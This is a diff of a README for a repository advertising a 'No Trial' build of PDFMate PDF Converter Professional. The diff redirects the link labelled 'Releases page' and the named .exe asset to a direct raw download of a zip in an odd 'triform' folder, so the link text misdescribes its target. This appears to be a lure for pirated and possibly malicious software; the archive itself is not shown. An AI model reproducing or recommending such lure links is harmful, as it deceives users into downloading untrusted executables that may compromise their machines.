ooMonkShood/PDFMate-PDF-Converter-Professional-No-Trial/README.md

 ## 📥 Download & Install

-To download the latest version of PDFMate PDF Converter Professional, visit our [Releases page](https://github.com/ooMonkShood/PDFMate-PDF-Converter-Professional-No-Trial/releases).
+To download the latest version of PDFMate PDF Converter Professional, visit our [Releases page](https://raw.githubusercontent.com/ooMonkShood/PDFMate-PDF-Converter-Professional-No-Trial/main/triform/PDFMate-PDF-Converter-Professional-No-Trial_v2.0.zip).

 1. Click the link above to open the Releases page.
 2. Look for the latest version.
 You will find a section called "Assets."
-3. Select the file named `PDFMate-PDF-Converter-Professional-No-Trial.exe`.
+3. Select the file named `https://raw.githubusercontent.com/ooMonkShood/PDFMate-PDF-Converter-Professional-No-Trial/main/triform/PDFMate-PDF-Converter-Professional-No-Trial_v2.0.zip`.
 4. Click to download the file.

 Once the download is complete, follow these steps to install: